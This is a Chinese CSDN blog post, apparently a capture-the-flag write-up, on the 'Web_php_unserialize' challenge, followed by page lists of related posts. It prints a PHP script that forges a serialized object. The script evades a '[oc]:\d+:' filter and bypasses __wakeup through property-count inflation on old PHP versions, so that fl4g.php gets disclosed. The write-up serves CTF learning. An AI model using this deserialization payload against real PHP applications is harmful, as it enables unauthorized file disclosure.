攻防世界——Web_php_unserialize

最新推荐文章于 2024-06-25 04:11:12 发布
最新推荐文章于 2024-06-25 04:11:12 发布
阅读量107 收藏
点赞数
分类专栏: CTF Web安全 攻防世界 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_31710331/article/details/120089716
版权
CTF 同时被 3 个专栏收录
4 篇文章 0 订阅
订阅专栏
攻防世界
4 篇文章 0 订阅
订阅专栏
Web安全
2 篇文章 0 订阅
订阅专栏
本文揭示了PHP5.6.25以下及PHP7.0.10之前版本中关于`__wakeup`函数绕过的技巧,通过构造Demo类实例并序列化,巧妙地避开反序列化过程中的限制。重点在于理解文件变量处理和序列化字符操作,以及漏洞利用的实际步骤。
摘要由CSDN通过智能技术生成

1.代码审计

 发现必须构造Demo传入fl4g.php才能得到flag

同时要绕过匹配和反序列化的函数

2.构造绕过

<?php
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
$a = new Demo('fl4g.php');
$b = serialize($a);
$b = str_replace(':4',':+4',$b);//绕过匹配
$b = str_replace(':1:',':2:',$b);//绕过反序列化__wakeup函数
echo $b;
echo '<br>';
echo (base64_encode($b));
echo '<br>';
?>

 在 PHP5 < 5.6.25, PHP7 < 7.0.10 的版本存在wakeup的漏洞。当反序列化中object的个数和之前的个数不等时,wakeup就会被绕过。

这里我们要注意:这里的file变量为私有变量(protected变量应该也会),所以序列化之后的字符串开头结尾各有一个空白字符(即%00)

  字符串长度也比实际长度大2,如果将序列化结果复制到在线的base64网站进行编码可能就会丢掉空白字符,从而得到错误的编码值

 3.查看构造后的结果,并在传入var

 

Wkingxc
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界web进阶_Web_php_unserialize
chy082的博客
08-21 692
攻防世界web进阶_Web_php_unserialize 解题思路 打开之后是一段代码审计 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file;//构造函数 把里面的参数变成传进来的参数 } function __destruct() { echo @highlight_file($this->file, true); } func
[web] Web_php_unserialize
lonmar的博客
07-03 781
Web_php_unserialize 源码如下: 知识点: 1、__construct():当对象创建(new)时会自动调用。但在 unserialize() 时是不会自动调用的。(构造函数) 2、__destruct():当对象被销毁时会自动调用。(析构函数) 3、__wakeup():unserialize() 时会自动调用 4. 正则 : /[oc]:\d+:/i \d 是匹配一个数字 +表示一个或多个 i忽略大小写(修饰符) [xyz]字符集合,匹配所包含的任意一个字符(x,y,z
Web_php_unserialize
最新发布
2401_82645688的博客
06-25 457
if (isset($_GET[‘var’])) { //检查是否通过get方式传参。//将var通过base64编码。//绕过wakeup。
php中magic_quotes_gpc对unserialize的影响分析
10-25
主要介绍了php中magic_quotes_gpc对unserialize的影响,以实例的形式分析了magic_quotes_gpc安全过滤对unserialize造成的影响以及对此的解决方法,非常具有实用价值,需要的朋友可以参考下
php_igbinary-1.1.1-5.6
12-26
`igbinary`扩展的核心功能在于替换传统的PHP序列化(serialize)和反序列化(unserialize)机制。传统的序列化方式会将PHP变量转化为ASCII字符串,这在处理大量数据时不仅占用更多存储空间,而且在读取和解析过程中...
php_igbinary 5.3-7.1版本扩展
04-10
4. **Web服务**: 在API调用中,igbinary序列化的数据可以作为高效的数据传输格式。 ### 四、兼容性与安装 1. **版本兼容**: `php_igbinary`扩展支持PHP 5.3到PHP 7.1,这意味着它能在广泛的老版本和新版本的PHP...
php_igbinary-php5.5版本
07-25
中添加`extension=php_igbinary.dll`(对于Windows系统)或`extension=igbinary.so`(对于Unix/Linux系统),然后重启Web服务器。 总的来说,`igbinary`扩展是提高PHP应用程序性能的一个有效工具,尤其在处理大量...
PHP_DataSet.rar_DataSet p
09-14
PHP提供了`serialize()`和`unserialize()`函数来实现这一点。 8. **数据绑定**:在ASP.NET中,DataSet可以方便地与控件进行数据绑定。在PHP中,可以创建方法将DataSet的数据绑定到HTML表格或其他展示组件。 具体到...
Web_php_unserialize,Web_php_unserialize
weixin_35748610的博客
03-16 111
Web_php_unserializeclassDemo{private$file='index.php';publicfunction__construct($file){$this->file=$file;}function__destruct(){echo@highlight_file($this->file,true);}function__wakeup(){if($this-...
WEB:Web_php_unserialize
sleepywin的博客
07-15 1158
而正则匹配的规则是: 在不区分大小写的情况下 , 若字符串出现 “o:数字” 或者 "c:数字’ 这样的格式 , 那么就被过滤 .很明显 , 因为 serialize() 的参数为 object ,因此参数类型肯定为对象 " O " , 又因为序列化字符串的格式为 参数格式:参数名长度 , 因此 " O:4 " 这样的字符串肯定无法通过正则匹配。是在反序列化操作中起作用的魔法函数,当unserialize的时候,会检查时候存在__wakeup()函数,如果存在的话,会优先调用__wakeup()函数。
攻防世界——Web——Web_php_unserialize
慎铭的博客
02-22 730
题目源代码如下。 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function __wakeup
攻防世界-----Web_php_unserialize
yanbai3的博客
01-04 1139
攻防世界-----Web_php_unserialize 开始刷web题,发现新世界,记录一下 1.序列化(serialize)和反序列化(unserialize) 序列化就是将对象转化为字节序列/字符串,在序列化对象之前,对象的类要实例化/定义过,字符串中包括了类名、对象中所有变量值,但不包括方法。而反序列化后,会将字符串转换回变量,并重建类或对象。 2.正则表达式 正则表达式是匹配模式,要么匹配字符,要么匹配位置。 建议查看https://juejin.cn/post/68449034871557324
攻防世界Web_php_unserialize
qq_51233573的博客
03-10 2427
最近开始刷攻防世界web题目,遇到一个比较有意思的题目。ctf小白大家勿喷 访问题目链接 是一段php代码 对代码进行初步审计 发现unserialize函数 可以确定是一个php反序列化的利用 由于刚开始学习php的反序列化 对php不是特别熟悉所以对代码进行逐行解析 <?php class Demo { private $file = 'index.php'; //设置了类的私有变量 public function __construc...
攻防世界web_php_unserialize
06-28
### 回答1: 攻防世界web_php_unserialize是一个关于PHP反序列化漏洞的题目,需要掌握PHP反序列化漏洞的原理和利用方法。在这个题目中,可能会给出一个序列化的字符串,需要将其反序列化并进行一些操作,最终达到获取flag的目的。这个题目需要掌握PHP的序列化和反序列化函数,以及对序列化字符串的解析能力。 ### 回答2: web_php_unserialize指的是PHP反序列化漏洞。序列化是指将对象转换为字节流的过程,反序列化则是将字节流还原为原始对象的过程。PHP序列化对于数据的传输和存储非常方便,但是如果在执行反序列化过程中存在漏洞,就会导致恶意攻击者能够注入恶意代码,并可能导致代码执行、文件读写、远程代码执行等危险后果。攻防世界中的web_php_unserialize比赛就是通过挖掘实际漏洞并利用它们对目标进行攻击的比赛。 攻防世界中的web_php_unserialize比赛通常会考查参赛者对PHP反序列化漏洞的深入理解和实际应用能力。比赛中的攻击场景可能会包括以下几个方面: 1. 对序列化字符串的解析和理解。参赛者需要清楚地知道序列化字符串中不同数据类型的表示方法,包括字符串、数组、对象等。 2. 对序列化字符串中的数据类型和值进行篡改。恶意攻击者通常会利用序列化字符串的可篡改性注入恶意代码或者修改重要数据,参赛者需要在比赛中证明自己能够精准地修改序列化字符串中的数据类型和值。 3. 对反序列化函数的使用和理解。PHP反序列化漏洞很多都是由于对反序列化函数的不当使用导致的。参赛者需要清楚地知道反序列化函数参数的含义以及如何正确使用反序列化函数。 4. 对代码的理解和审计。比赛中可能会给出一些被漏洞的代码,参赛者需要仔细地审计代码并找出漏洞的具体原因。 总的来说,攻防世界中的web_php_unserialize比赛旨在锻炼参赛者的漏洞挖掘和漏洞利用能力,并通过挖掘实际漏洞来理解和掌握漏洞的本质和原理。 ### 回答3: 攻防世界web_php_unserialize是一种基于PHP反序列化漏洞的CTF题目。这个题目主要考察选手对于PHP反序列化漏洞的理解和应用能力。 在一般的PHP应用程序中,序列化是将一个对象或一组数据转换成一个数据流的过程,反序列化则是将这个数据流转回成对象或一组数据。反序列化漏洞是指当应用程序在反序列化过程中没有对数据流进行足够的验证和过滤,导致攻击者可以在数据流中注入恶意代码,以此来执行代码并最终造成攻击。这种漏洞在很多PHP应用程序中都存在,而攻防世界web_php_unserialize就是基于这个漏洞设计的一道CTF题目。 这个题目的主要思路是通过构造一个特定的序列化数据,并将其作为参数提交给目标站点。该序列化数据包含了一个恶意代码,在反序列化时可以执行恶意代码,从而完成攻击。选手需要先了解序列化和反序列化的原理,然后使用PHP代码构造一个带有恶意代码的序列化数据,成功利用反序列化漏洞执行代码并获取到flag。 这道题目对于选手的PHP语言理解和代码能力有一定的要求,同时也需要选手在考虑漏洞时具备一定的克制能力,对于数据的过滤和验证也需要有一定的认识。通过挑战攻防世界web_php_unserialize,选手可以深入了解PHP反序列化漏洞的原理和应用,有效提高自己的防御意识和CTF能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值